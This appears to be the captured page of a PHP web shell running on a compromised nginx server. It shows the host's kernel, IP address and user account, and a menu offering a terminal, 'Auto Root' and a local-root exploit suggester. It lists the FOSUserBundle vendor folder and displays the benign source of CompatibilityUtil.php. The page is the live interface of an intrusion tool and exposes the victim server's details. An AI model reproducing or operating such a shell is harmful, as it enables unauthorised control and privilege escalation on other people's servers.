Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 216.73.216.40
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
vendor /
friendsofsymfony /
user-bundle /
Delete
Unzip
Name
Size
Permission
Date
Action
Command
[ DIR ]
drwxrwxr-x
2022-04-28 07:54
Controller
[ DIR ]
drwxrwxr-x
2022-04-28 07:54
DependencyInjection
[ DIR ]
drwxrwxr-x
2022-04-28 07:54
Doctrine
[ DIR ]
drwxrwxr-x
2022-04-28 07:54
Event
[ DIR ]
drwxrwxr-x
2022-04-28 07:54
EventListener
[ DIR ]
drwxrwxr-x
2022-04-28 07:54
Form
[ DIR ]
drwxrwxr-x
2022-04-28 07:54
Mailer
[ DIR ]
drwxrwxr-x
2022-04-28 07:54
Model
[ DIR ]
drwxrwxr-x
2022-04-28 07:54
Resources
[ DIR ]
drwxrwxr-x
2022-04-28 07:54
Security
[ DIR ]
drwxrwxr-x
2022-04-28 07:54
Util
[ DIR ]
drwxrwxr-x
2022-04-28 07:54
Validator
[ DIR ]
drwxrwxr-x
2022-04-28 07:54
CompatibilityUtil.php
1.18
KB
-rw-rw-r--
2022-04-28 07:54
FOSUserBundle.php
2.87
KB
-rw-rw-r--
2022-04-28 07:54
FOSUserEvents.php
9.59
KB
-rw-rw-r--
2022-04-28 07:54
LICENSE
1.04
KB
-rw-rw-r--
2022-04-28 07:54
composer.json
2.41
KB
-rw-rw-r--
2022-04-28 07:54
Save
Rename
<?php /* * This file is part of the FOSUserBundle package. * * (c) FriendsOfSymfony <http://friendsofsymfony.github.com/> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace FOS\UserBundle; use Symfony\Component\EventDispatcher\GenericEvent; use Symfony\Component\EventDispatcher\LegacyEventDispatcherProxy; use Symfony\Contracts\EventDispatcher\Event; use Symfony\Contracts\EventDispatcher\EventDispatcherInterface; /** * @internal */ final class CompatibilityUtil { public static function upgradeEventDispatcher(EventDispatcherInterface $eventDispatcher): EventDispatcherInterface { // On Symfony 5.0+, the legacy proxy is a no-op and it is deprecated in 5.1+ // Detecting the parent class of GenericEvent (which changed in 5.0) allows to avoid using the deprecated no-op API. if (is_subclass_of(GenericEvent::class, Event::class)) { return $eventDispatcher; } // BC layer for Symfony 4.4 where we need to apply the decorating proxy in case of non-upgraded dispatcher. return LegacyEventDispatcherProxy::decorate($eventDispatcher); } }